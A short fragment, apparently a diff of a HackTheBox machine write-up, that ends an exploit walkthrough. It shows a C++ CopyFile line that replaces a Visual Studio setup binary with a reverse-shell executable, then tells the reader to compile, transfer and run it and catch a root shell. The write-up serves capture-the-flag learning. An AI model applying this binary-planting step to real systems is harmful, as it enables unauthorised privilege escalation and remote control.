donovan-jasper/donovan-jasper.github.io/content/docs/cybersecurity/hackthebox/compiled.md

 CopyFile(L"c:\\temp\\reverse.exe", L"C:\\ProgramData\\Microsoft\\VisualStudio\\SetupWMI\\MofCompiler.exe", FALSE);
 ```

 Compile the exploit with VS Code C++ Release on release mode.
+Then transfer and execute the binary.

 Catch your shell and gain root access!